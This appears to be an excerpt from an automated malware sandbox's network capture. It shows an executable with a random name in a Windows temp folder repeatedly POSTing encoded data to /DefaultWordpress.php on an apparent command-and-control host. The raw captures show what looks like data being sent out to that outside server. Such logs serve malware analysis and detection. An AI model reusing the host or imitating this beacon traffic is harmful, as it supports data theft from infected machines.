                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:34.041695118 CEST | 2520 | OUT | Data Raw: 5b 5e 5c 5d 5a 5a 54 50 54 5b 52 57 50 5a 57 52 50 58 5d 5e 50 57 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^\]ZZTPT[RWPZWRPX]^PWWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=0-X%1V+#('-(= X=,$'=Y&"#$89'.^<#F $P.<
                                                          Oct 20, 2024 18:18:34.474528074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:35.146827936 CEST | 795 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BbUuClcWLPUvyVQgwkt%2BWue85tez%2BayRy84isbmOdkvTQjy5bTTIESfdNOm%2F0QnH0aWPkxKePAgSlOn8Z%2BtVAzKDscSX9xxC7UR%2FlXVV4K7%2BGEsyRVU40d00k9SKUUasBRr4yWb7zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5314e9af1828-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11676&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=125520&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:35.147418976 CEST | 795 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BbUuClcWLPUvyVQgwkt%2BWue85tez%2BayRy84isbmOdkvTQjy5bTTIESfdNOm%2F0QnH0aWPkxKePAgSlOn8Z%2BtVAzKDscSX9xxC7UR%2FlXVV4K7%2BGEsyRVU40d00k9SKUUasBRr4yWb7zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5314e9af1828-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11676&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=125520&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.5 | 49945 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:36.039418936 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:36.385966063 CEST | 2528 | OUT | Data Raw: 5b 5f 59 58 5f 5e 54 52 54 5b 52 57 50 5f 57 54 50 5c 5d 57 50 57 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [_YX_^TRT[RWP_WTP\]WPWW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>%=V+#$'8W<.\)70;_2_3;1$)+*#F $P.0
                                                          Oct 20, 2024 18:18:36.837785959 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:37.200413942 CEST | 797 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDc1R3LuLMa4vYR6DLR6kRqtI7VJjo%2By8OK1muCuJQ3xR8PEcM8MQPA%2B%2B%2FSZ7A%2FAn4iynSna7CV80vU7U%2BSMz74gU94iLAUhmJadvtBZgE2F1TQK6uaL0Ifv3b%2BmTnh%2BomcNvlOTBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5323be0567f4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11482&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=126961&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.5 | 49946 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:36.219856977 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:36.573015928 CEST | 1948 | OUT | Data Raw: 5e 5b 5c 52 5a 52 54 56 54 5b 52 57 50 59 57 5c 50 51 5d 56 50 54 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[\RZRTVT[RWPYW\PQ]VPTW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ^*!$;"?3;]'&?=<](/<$-&$^&]3(#F $P.(
                                                          Oct 20, 2024 18:18:37.481452942 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:38.702492952 CEST | 940 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98LmNJ9KbGsunzNN2vjDv%2BskT%2BIyKjO327MNlAgxnTqSuLolDpCglZqCO5Xp3thTWn5o67o66fi9q6ZljZMmOVdizfwjf%2B3r8Ju%2Bqz2F8FhvqHOBc0TdAXj0383UkP1ZxMdKqQ%2FWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5327bb4bcf09-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12424&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=125902&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 59 24 2c 27 54 3e 3f 30 54 2e 00 2e 0f 39 04 37 14 3a 08 21 58 25 33 2e 5e 31 3a 29 1e 26 33 33 5b 36 2c 0c 5a 21 2f 0f 10 39 0c 28 5e 07 12 26 5c 3d 2f 34 5d 29 5b 3f 01 3c 2b 37 04 36 27 30 1d 25 03 33 11 30 03 29 14 3e 1f 39 10 3d 03 00 1d 2e 37 3a 19 2d 3b 38 5d 22 2a 22 53 03 13 25 11 3d 1e 05 02 21 32 23 5a 3c 2d 23 59 3f 5e 22 1f 3d 33 3f 5a 3c 2b 27 12 2d 2d 25 01 24 11 38 5f 26 2c 28 58 26 03 3c 0d 27 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&Y$,'T>?0T..97:!X%3.^1:)&33[6,Z!/9(^&\=/4])[?<+76'0%30)>9=.7:-;8]"*"S%=!2#Z<-#Y?^"=3?Z<+'--%$8_&,(X&<'$^-/W6[O0
                                                          Oct 20, 2024 18:18:38.705341101 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:38.878670931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:38.878834009 CEST | 2528 | OUT | Data Raw: 5e 5f 5c 53 5a 5f 54 51 54 5b 52 57 50 59 57 53 50 5a 5d 57 50 50 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^_\SZ_TQT[RWPYWSPZ]WPPWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ =0!X&!V(/^$(.?(Z=;'$&2#^'8$X=?#F $P.(
                                                          Oct 20, 2024 18:18:39.293513060 CEST | 799 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pUp8mWP1nWXsyoXLlb6FOmwLzYv6mTf%2F7A0yeQ6%2BV8aqux0EbYUbm%2FidUFTc%2FwPcbELeW7d7LDStZTc%2FIYUSmh9KJTEHLTlA%2Bsitaa%2Bg%2BUXiLUgGLQoJFP46kM3SejMoQ5evsfNEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53307bd8cf09-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12333&sent=7&recv=12&lost=0&retrans=0&sent_bytes=990&recv_bytes=5074&delivery_rate=233134&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.5 | 49949 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:36.320341110 CEST | 310 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:36.666632891 CEST | 540 | OUT | Data Raw: 5e 5b 59 5c 5a 5f 51 53 54 5b 52 57 50 58 57 54 50 5f 5d 5d 50 54 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[Y\Z_QST[RWPXWTP_]]PTWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)3&&+3+'?>$Y*(]0+Z%,30.:?#F $P.,
                                                          Oct 20, 2024 18:18:37.115701914 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:37.344726086 CEST | 792 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmPKnOxfI4U00syL4ypqc0RlwM%2B3U3wqhdGUT89CClzhBcK1PSt6aAi2pl0N904CY%2FMayjX1eXnkOVIT8nBvN2%2BAJdZIh3HRsA25TiQA42h%2FpFpD8%2BSZYFxSv8Vv5ek5%2Bia30VQYGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53257d2d69a2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11159&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=130756&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:37.345263958 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqm
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3014
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:37.509793997 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:37.510169029 CEST | 3014 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 33 6f 41 4f 64 69 49 6c 34 39 41 78 4c 50 6c 34 63 31 6b 43 4a 46 4b 38 71 6b 77 4f 69 7a 7a 6e 71 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqmContent-Disposition: form-data; name="0"Content-Type: text/plain^XYYZSTUT[RWP[W\P[]WPPWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:38.702883959 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RL28AiN80OgRQr0vA7lEXv%2FZzr%2FmBc8pNCOUjLuF9TQ%2BoKSSktIsPKDCpoIubBc8UkaQ9CQ6lmuNuDstBMtwtoLskNLYH4uuzEYKqbtXrbjGrl3sDZXRs5fIFzj%2B5qgXlFmLuM04vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5327eed869a2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11107&sent=7&recv=11&lost=0&retrans=0&sent_bytes=842&recv_bytes=4186&delivery_rate=261584&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          35 | 192.168.2.5 | 49960 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:39.444996119 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:39.792088032 CEST | 2520 | OUT | Data Raw: 5b 50 59 5f 5a 5c 54 52 54 5b 52 57 50 5a 57 5c 50 5b 5d 56 50 5c 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [PY_Z\TRT[RWPZW\P[]VP\WT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ =9[1;9R?3?]'+&?>8=/;'#124'8)3=&Y+:#F $P.
                                                          Oct 20, 2024 18:18:40.219455004 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:40.453820944 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNtiW43YIpajB0WK6mlm2EmGxDwLTVFwArudVRPWS63zo0fccZftNLkRacTSOiBHpGu4Ev0WemYfcHzDW71aQHMp35GlRm%2BJ5dG9rPLqzqLjkwdT0dLyhb%2FeTfRFKyyEuZ1MSO1QSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5338db4ccf23-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11115&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2807&delivery_rate=129772&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          36 | 192.168.2.5 | 49966 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:40.580960989 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2516
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:40.933163881 CEST | 2516 | OUT | Data Raw: 5e 5a 5c 5a 5a 5b 54 57 54 5b 52 57 50 5a 57 54 50 5b 5d 5e 50 5d 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^Z\ZZ[TWT[RWPZWTP[]^P]WZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ (39X&;>#'8?.(/8Z'-?^&0[%.Y+#F $P.,
                                                          Oct 20, 2024 18:18:42.321527004 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:42.557351112 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7l6w31%2FbhUISBuFL5E6cYTpfLD3QzAZhyY3N1IDwKxbPcaBLeaZTEjQNpnCYJzysFh3R53Rut1I3fFqm6QqK%2FP%2FczLYmKcKBb4bFfQ3HRLIWBZ0GEx5nrP7UoAdjTL2C3OZ%2FE71Hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5345fdaf980c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12954&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=112422&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          37 | 192.168.2.5 | 49975 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:42.804683924 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:43.150917053 CEST | 2528 | OUT | Data Raw: 5e 5d 59 5b 5a 5a 54 50 54 5b 52 57 50 59 57 5c 50 51 5d 57 50 5c 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]Y[ZZTPT[RWPYW\PQ]WP\W^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _)*%]><+Z$8+;(/<'0%"/Y3='X)+#F $P.(
                                                          Oct 20, 2024 18:18:43.588270903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:43.816168070 CEST | 790 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1iF7Du0PhArnME948vgpIot2aexpvi2RfXP7LvxG1Bs2Bh03m2%2BXZ%2FID4LuIOMJjiAYt4bYVt6wq6EoLbmJ4NM%2FTgzkUGmrXJXY558LeXeot183MZYwU5hD%2B9C0tVNcF1qYWrTTGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a534deb68969a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11062&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130709&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          38 | 192.168.2.5 | 49979 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:43.719976902 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
